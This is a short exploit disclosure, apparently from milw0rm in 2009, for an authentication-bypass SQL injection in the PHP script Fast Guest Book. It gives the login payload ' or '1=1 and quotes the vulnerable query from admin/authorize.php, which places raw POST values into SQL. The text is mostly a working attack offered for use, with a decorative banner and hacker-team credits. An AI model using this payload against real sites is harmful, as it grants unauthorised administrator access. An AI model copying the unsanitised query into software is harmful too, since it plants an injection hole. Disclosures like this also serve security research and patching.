########################################################################### #-----------------------------I AM MUSLIM !!------------------------------# ########################################################################### ============================================================================== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| ============================================================================== ============================================================================== Fast Guest Book (Auth Bypass) SQL Injection Vulnerability ============================================================================== [»] Script: [ Fast Guest Book ] [»] Language: [ PHP ] [»] Website: [ http://fastcreators.com/products/guestbook/download.php ] [»] Founder: [ Moudi ] [»] Thanks to: [ MiZoZ , ZuKa , str0ke , and all hackers... ] [»] Team: [ EvilWay ] ########################################################################### ===[ Exploit ]=== [»] ' or '1=1 ===[ BUG ]=== [»] Bug In \admin\authorize.php $query = "select * from admin where userid='{$_POST['uname']}' AND pass='{$_POST['pass']}'"; Author: Moudi ########################################################################### # milw0rm.com [2009-01-11]